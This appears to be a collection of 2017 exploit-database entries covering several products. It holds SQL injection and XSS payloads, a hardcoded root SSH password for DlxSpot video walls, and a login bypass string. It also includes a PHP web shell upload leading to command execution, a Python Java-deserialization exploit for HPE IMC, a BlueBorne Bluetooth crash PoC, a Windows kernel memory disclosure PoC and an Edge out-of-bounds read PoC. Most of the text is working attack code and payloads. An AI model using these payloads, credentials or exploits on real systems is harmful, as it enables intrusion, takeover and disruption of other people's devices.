for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
for (ULONG i = 0; i < size; i++) {
ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static BYTE buffer[4096];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
// Windows 10 1607 32-bit.
CONST ULONG __NR_NtQueryCompositionSurfaceBinding = 0x13e0;
// Convert thread to GUI.
LoadLibrary(L"user32.dll");
// Spray the kernel stack to get visible results of the memory disclosure.
SprayKernelStack();
// Trigger the bug and display the output.
BYTE OutputBuffer[0x308] = { /* zero padding */ };
SystemCall32(__NR_NtQueryCompositionSurfaceBinding, 0, 0, OutputBuffer);
PrintHex(OutputBuffer, sizeof(OutputBuffer));
return 0;
}
# Exploit Title: iTech Gigs Script v1.20 - SQL Injection
# Date: 2017-09-15
# Exploit Author: 8bitsec
# Vendor Homepage: http://itechscripts.com/
# Software Link: http://itechscripts.com/the-gigs-script/
# Version: 1.20
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-15
Product & Service Introduction:
===============================
Designed to launch an online market place facilitating participation of professionals from diverse walks of life.
Technical Details & Description:
================================
SQL injection on [cat] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/browse-category.php?cat=xxxxx' AND 4079=4079 AND 'zpSy'='zpSy
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=10c4ca4238a0b923820dcc509a6f75849b' AND 4079=4079 AND 'zpSy'='zpSy
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password.
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc.
# CVE: CVE-2017-12928
# Linked CVE's: CVE-2017-12929, CVE-2017-12930
# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.
###############################################################################################################################
Hardcoded password for all dlxspot players, login with the following credentials via SSH
username: dlxuser
password: tecn0visi0n
Escalate to root with the same password.
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.
2017-06-01 - No response, tried contacting again through several contact forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL
Injection
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12930
# Linked CVE's: CVE-2017-12928, CVE-2017-12929
# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to full root access.
###############################################################################################################################
DlxSpot Player 4 above version 1.5.10 suffers from an SQL injection
vulnerability in the admin interface login and is exploitable the following
way:
username:admin
password:x' or 'x'='x
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
# Exploit Title: Foodspotting Clone v1.0 - SQL Injection/Reflected XSS
# Date: 2017-09-13
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.phpscriptsmall.com/product/foodspotting-clone/
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-13
Product & Service Introduction:
===============================
Foodspotting Clone allows you to initiate your very own social networking website that similar appearance as Foodspotting and additional food lover websites.
Technical Details & Description:
================================
Reflected XSS/SQL injection on [resid] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/restaurant-menu.php?resid=' AND SLEEP(5) AND 'nhSH'='nhSH
Parameter: resid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: resid=' AND SLEEP(5) AND 'nhSH'='nhSH
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: resid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x435a72445467737074496d6e5a7855726f6e534c4b6469705774427550576c70676d425361626642,0x71767a6271),NULL,NULL,NULL-- aIwp
Reflected XSS:
http://localhost/[path]/restaurant-menu.php?resid=/"><svg/onload=alert(/8bitsec/)>
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload
to RCE
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12929
# Linked CVE's: CVE-2017-12928, CVE-2017-12930.
# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to root access.
###############################################################################################################################
Arbitrary File Upload leading to Remote Command Execution:
1. Visit http://host/resource.php and upload PHP shell. For example: <?php
system($_GET["c"]); ?>
2. RCE via http://host/resource/source/shell.php?c=id
3. Output: www-data
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
#!/usr/bin/env python
########################################################################################################
#
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
# Tested on Windows Server 2008 R2
# Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
#
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################
import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
host = "127.0.0.1:8080"
payload_file = "payload.bin"
body = ""
def printUsage () :
print "......................................................................................................................"
print "."
print ". HPE/H3C - IMC Java Deserialization Exploit"
print "."
print ". Example 1: -payload-binary"
print ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % sys.argv[0]
print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
print ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) "
print ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin"
print ". 2. Send request to server"
print ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
print "."
print ". Example 2: -payload-string"
print '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % sys.argv[0]
print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
print ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)"
print '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
print "."
print "......................................................................................................................"
def loadPayloadFile (_fileName) :
print "[+] Load payload file %s" % _fileName
payloadFile = open(_fileName, 'rb')
payloadFile_read = payloadFile.read()
return payloadFile_read
def exploit (_payload) :
url = sys.argv[1]
url += "/imc/topo/WebDMServlet"
print "[+] Sending exploit to %s" % (url)
data = _payload
response = requests.post(url, data=data, verify=False)
return response
#def showResponse(_response):
# r = response
# m = r.search(_response)
# if (m.find("java.lang.NullPointerException")):
# print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
# else:
# print "[-] ClassCastException not found, exploit failed"
if __name__ == "__main__":
if len(sys.argv) < 4:
printUsage()
sys.exit(0)
else:
print "------------------------------------------"
print "- HPE/H3C - IMC Java Deserialization Exploit -"
print "------------------------------------------"
host = sys.argv[1]
print "[*] Connecting to %s" %host
if sys.argv[2] == "-payload-binary":
payload_file = sys.argv[3]
if os.path.isfile(payload_file):
payload = loadPayloadFile(payload_file)
response = exploit(payload)
showResponse(response.content)
else:
print "[-] Can't load payload file"
elif sys.argv[2] == "-payload-string":
if os.path.isfile("ysoserial.jar"):
sPayload = sys.argv[3]
sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin"
print "[+] Create payload file (%s) " %sPayload
os.system(sPayload)
payload = loadPayloadFile(payload_file)
response = exploit(payload)
print "[+] Response received, exploit finished."
else:
print "[-] Can't load ysoserial.jar"
else:
printUsage()
# Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized -
DoS (Crash) only
# Date: 09/21/2017
# Exploit Author: Marcin Kozlowski <marcinguy@gmail.com>
# Version: Kernel version v3.3-rc1, and thus affects all version from there on
# Tested on: Linux 4.4.0-93-generic #116
# CVE : CVE-2017-1000251
# Provided for legal security research and testing purposes ONLY.
Proof of Concept - Crash Only - Unarmed/Unweaponized/No Payload
After reading tons of Documentation and Protocol specifications.
1) Install Scapy
https://github.com/secdev/scapy
Add/Replace these requests and responses in Bluetooth Protocol stack to these:
scapy/layers/bluetooth.py
class L2CAP_ConfReq(Packet):
name = "L2CAP Conf Req"
fields_desc = [ LEShortField("dcid",0),
LEShortField("flags",0),
ByteField("type",0),
ByteField("length",0),
ByteField("identifier",0),
ByteField("servicetype",0),
LEShortField("sdusize",0),
LEIntField("sduarrtime",0),
LEIntField("accesslat",0),
LEIntField("flushtime",0),
]
class L2CAP_ConfResp(Packet):
name = "L2CAP Conf Resp"
fields_desc = [ LEShortField("scid",0),
LEShortField("flags",0),
LEShortField("result",0),
ByteField("type0",0),
ByteField("length0",0),
LEShortField("option0",0),
ByteField("type1",0),
ByteField("length1",0),
LEShortField("option1",0),
ByteField("type2",0),
ByteField("length2",0),
LEShortField("option2",0),
ByteField("type3",0),
ByteField("length3",0),
LEShortField("option3",0),
ByteField("type4",0),
ByteField("length4",0),
LEShortField("option4",0),
ByteField("type5",0),
ByteField("length5",0),
LEShortField("option5",0),
ByteField("type6",0),
ByteField("length6",0),
LEShortField("option6",0),
ByteField("type7",0),
ByteField("length7",0),
LEShortField("option7",0),
ByteField("type8",0),
ByteField("length8",0),
LEShortField("option8",0),
ByteField("type9",0),
ByteField("length9",0),
LEShortField("option9",0),
ByteField("type10",0),
ByteField("length10",0),
LEShortField("option10",0),
ByteField("type11",0),
ByteField("length11",0),
LEShortField("option11",0),
ByteField("type12",0),
ByteField("length12",0),
LEShortField("option12",0),
ByteField("type13",0),
ByteField("length13",0),
LEShortField("option13",0),
ByteField("type14",0),
ByteField("length14",0),
LEShortField("option14",0),
ByteField("type15",0),
ByteField("length15",0),
LEShortField("option15",0),
ByteField("type16",0),
ByteField("length16",0),
LEShortField("option16",0),
ByteField("type17",0),
ByteField("length17",0),
LEShortField("option17",0),
ByteField("type18",0),
ByteField("length18",0),
LEShortField("option18",0),
ByteField("type19",0),
ByteField("length19",0),
LEShortField("option19",0),
ByteField("type20",0),
ByteField("length20",0),
LEShortField("option20",0),
ByteField("type21",0),
ByteField("length21",0),
LEShortField("option21",0),
ByteField("type22",0),
ByteField("length22",0),
LEShortField("option22",0),
ByteField("type23",0),
ByteField("length23",0),
LEShortField("option23",0),
ByteField("type24",0),
ByteField("length24",0),
LEShortField("option24",0),
ByteField("type25",0),
ByteField("length25",0),
LEShortField("option25",0),
ByteField("type26",0),
ByteField("length26",0),
LEShortField("option26",0),
ByteField("type27",0),
ByteField("length27",0),
LEShortField("option27",0),
ByteField("type28",0),
ByteField("length28",0),
LEShortField("option28",0),
ByteField("type29",0),
ByteField("length29",0),
LEShortField("option29",0),
ByteField("type30",0),
ByteField("length30",0),
LEShortField("option30",0),
ByteField("type31",0),
ByteField("length31",0),
LEShortField("option31",0),
ByteField("type32",0),
ByteField("length32",0),
LEShortField("option32",0),
ByteField("type33",0),
ByteField("length33",0),
LEShortField("option33",0),
ByteField("type34",0),
ByteField("length34",0),
LEShortField("option34",0),
ByteField("type35",0),
ByteField("length35",0),
LEShortField("option35",0),
ByteField("type36",0),
ByteField("length36",0),
LEShortField("option36",0),
ByteField("type37",0),
ByteField("length37",0),
LEShortField("option37",0),
ByteField("type38",0),
ByteField("length38",0),
LEShortField("option38",0),
ByteField("type39",0),
ByteField("length39",0),
LEShortField("option39",0),
ByteField("type40",0),
ByteField("length40",0),
LEShortField("option40",0),
ByteField("type41",0),
ByteField("length41",0),
LEShortField("option41",0),
ByteField("type42",0),
ByteField("length42",0),
LEShortField("option42",0),
ByteField("type43",0),
ByteField("length43",0),
LEShortField("option43",0),
ByteField("type44",0),
ByteField("length44",0),
LEShortField("option44",0),
ByteField("type45",0),
ByteField("length45",0),
LEShortField("option45",0),
ByteField("type46",0),
ByteField("length46",0),
LEShortField("option46",0),
ByteField("type47",0),
ByteField("length47",0),
LEShortField("option47",0),
ByteField("type48",0),
ByteField("length48",0),
LEShortField("option48",0),
ByteField("type49",0),
ByteField("length49",0),
LEShortField("option49",0),
ByteField("type50",0),
ByteField("length50",0),
LEShortField("option50",0),
ByteField("type51",0),
ByteField("length51",0),
LEShortField("option51",0),
ByteField("type52",0),
ByteField("length52",0),
LEShortField("option52",0),
ByteField("type53",0),
ByteField("length53",0),
LEShortField("option53",0),
ByteField("type54",0),
ByteField("length54",0),
LEShortField("option54",0),
ByteField("type55",0),
ByteField("length55",0),
LEShortField("option55",0),
ByteField("type56",0),
ByteField("length56",0),
LEShortField("option56",0),
ByteField("type57",0),
ByteField("length57",0),
LEShortField("option57",0),
ByteField("type58",0),
ByteField("length58",0),
LEShortField("option58",0),
ByteField("type59",0),
ByteField("length59",0),
LEShortField("option59",0),
ByteField("type60",0),
ByteField("length60",0),
LEShortField("option60",0),
ByteField("type61",0),
ByteField("length61",0),
LEShortField("option61",0),
ByteField("type62",0),
ByteField("length62",0),
LEShortField("option62",0),
ByteField("type63",0),
ByteField("length63",0),
LEShortField("option63",0),
ByteField("type64",0),
ByteField("length64",0),
LEShortField("option64",0),
ByteField("type65",0),
ByteField("length65",0),
LEShortField("option65",0),
ByteField("type66",0),
ByteField("length66",0),
LEShortField("option66",0),
ByteField("type67",0),
ByteField("length67",0),
LEShortField("option67",0),
ByteField("type68",0),
ByteField("length68",0),
LEShortField("option68",0),
ByteField("type69",0),
ByteField("length69",0),
LEShortField("option69",0),
]
2) Exploit
bluebornexploit.py
------------------------
from scapy.all import *
pkt = L2CAP_CmdHdr(code=4)/
L2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff)
pkt1 = L2CAP_CmdHdr(code=5)/
L2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,length37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000)
bt = BluetoothL2CAPSocket("00:1A:7D:DA:71:13")
bt.send(pkt)
bt.send(pkt1)
bluetoothsrv.py
--------------------
from scapy.all import *
bt = BluetoothL2CAPSocket("01:02:03:04:05:06")
bt.recv()
DEMO:
https://imgur.com/a/zcvLb
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1301
There is an out-of-bounds read issue in Microsoft Edge that could potentially be turned into remote code execution. The vulnerability has been confirmed on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393) as well as Microsoft Edge 40.15063.0.0 (Microsoft EdgeHTML 15.15063).
PoC:
==========================================
-->
<!-- saved from url=(0014)about:internet -->
<script>
function go() {
select1.multiple = false;
var optgroup = document.createElement("optgroup");
select1.add(optgroup);
var options = select1.options;
select2 = document.createElement("select");
textarea.setSelectionRange(0,1000000);
select1.length = 2;
document.getElementsByTagName('option')[0].appendChild(textarea);
select1.multiple = true;
textarea.setSelectionRange(0,1000000);
document.execCommand("insertOrderedList", false);
select2.length = 100;
select2.add(optgroup);
//alert(options.length);
var test = options[4];
//alert(test);
}
</script>
<body onload=go()>
<textarea id="textarea"></textarea>
<select id="select1" contenteditable="true"></select>
<!--
=========================================
Preliminary analysis:
When opening the PoC in Edge under normal circumstances, the content process will occasionally crash somewhere inside Js::CustomExternalObject::GetItem (see Debug Log 1 below) which corresponds to 'var test = options[4];' line in the PoC. Note that multiple page refreshes are usually needed to get the crash.
The real cause of the crash can be seen if Page Heap is applied to the MicrosoftEdgeCP.exe process and MemGC is disabled with OverrideMemoryProtectionSetting=0 registry flag (otherwise Page Heap settings won't apply to the MemGC heap). In that case an out-of-bounds read can be reliably observed in COptionsCollectionCacheItem::GetAt function (see Debug Log 2 below). What happens is that Edge thinks 'options' array contains 102 elements (this can be verified by uncommenting 'alert(options.length);' line in the PoC), however in reality the Options cache buffer is going to be smaller and only contain 2 elements. Thus if an attacker requests an object that is past the end of the cache buffer (note: the offset is chosen by the attacker) an incorrect object may be returned which can potentially be turned into a remote code execution.
Note: Debug logs were obtained on an older version of Edge for which symbols were available. However I verified that the bug also affects the latest version.
Debug log 1:
=========================================
(1790.17bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chakra!Js::CrossSite::MarshalVar+0x37:
00007ffa`c8dc23f7 488b4808 mov rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????
0:010> k
# Child-SP RetAddr Call Site
00 00000071`3ecfb090 00007ffa`c8dc0c92 chakra!Js::CrossSite::MarshalVar+0x37
01 00000071`3ecfb0c0 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x1c2
02 00000071`3ecfb1a0 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
03 00000071`3ecfb200 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
04 00000071`3ecfb290 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
05 00000071`3ecfb2f0 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
06 00000071`3ecfb380 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
07 00000071`3ecfb3c0 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
08 00000071`3ecfb450 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
09 00000071`3ecfb4b0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
0a 00000071`3ecfb860 000001b7`d68e0fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0b 00000071`3ecfb8b0 00007ffa`c8e77273 0x000001b7`d68e0fb2
0c 00000071`3ecfb8e0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
0d 00000071`3ecfb930 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0e 00000071`3ecfb990 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
0f 00000071`3ecfb9e0 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
10 00000071`3ecfba70 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
11 00000071`3ecfbad0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
12 00000071`3ecfbe20 000001b7`d68e0fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
13 00000071`3ecfbe70 00007ffa`c8e77273 0x000001b7`d68e0fba
14 00000071`3ecfbea0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
15 00000071`3ecfbef0 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
16 00000071`3ecfbf50 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
17 00000071`3ecfc040 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
18 00000071`3ecfc0b0 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
19 00000071`3ecfc150 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
1a 00000071`3ecfc1e0 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
1b 00000071`3ecfc280 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
1c 00000071`3ecfc2d0 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
1d 00000071`3ecfc310 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
1e 00000071`3ecfc490 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
1f 00000071`3ecfc510 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
20 00000071`3ecfc670 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
21 00000071`3ecfc6a0 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
22 00000071`3ecfc970 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
23 00000071`3ecfc9c0 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
24 00000071`3ecfcad0 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
25 00000071`3ecfcb90 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
26 00000071`3ecfcbc0 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
27 00000071`3ecfd050 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
28 00000071`3ecfd150 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
29 00000071`3ecfd210 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
2a 00000071`3ecfd370 00007ffa`c0cccdf1 user32!DispatchMessageWorker+0x1ac
2b 00000071`3ecfd3f0 00007ffa`c0ccc3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
2c 00000071`3ecff640 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
2d 00000071`3ecff760 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
2e 00000071`3ecff790 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
2f 00000071`3ecff7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:010> r
rax=00000001afccb7d4 rbx=000001b7d669fd80 rcx=ffff000000000000
rdx=00000001afccb7d4 rsi=000001afce6556d0 rdi=000000713ecfb250
rip=00007ffac8dc23f7 rsp=000000713ecfb090 rbp=000000713ecfb141
r8=0000000000000000 r9=000001b7d8a94bd0 r10=0000000000000005
r11=000001b7d9ebcee0 r12=0000000000000003 r13=0001000000000004
r14=0000000000000004 r15=000001afce6556d0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::CrossSite::MarshalVar+0x37:
00007ffa`c8dc23f7 488b4808 mov rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????
=========================================
Debug log 2 (with Page Heap on for MicrosoftEdgeCP.exe and MemGC disabled):
=========================================
(de8.13c8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
00007ffa`c96b1581 488b04d0 mov rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????
0:010> k
# Child-SP RetAddr Call Site
00 00000091`94ffb2c0 00007ffa`c9569bb2 edgehtml!COptionsCollectionCacheItem::GetAt+0x51
01 00000091`94ffb2f0 00007ffa`c8dc0c51 edgehtml!CElementCollectionTypeOperations::GetOwnItem+0x122
02 00000091`94ffb330 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x181
03 00000091`94ffb410 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
04 00000091`94ffb470 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
05 00000091`94ffb500 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
06 00000091`94ffb560 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
07 00000091`94ffb5f0 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
08 00000091`94ffb630 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
09 00000091`94ffb6c0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
0a 00000091`94ffb720 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
0b 00000091`94ffbad0 000001b6`4f600fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
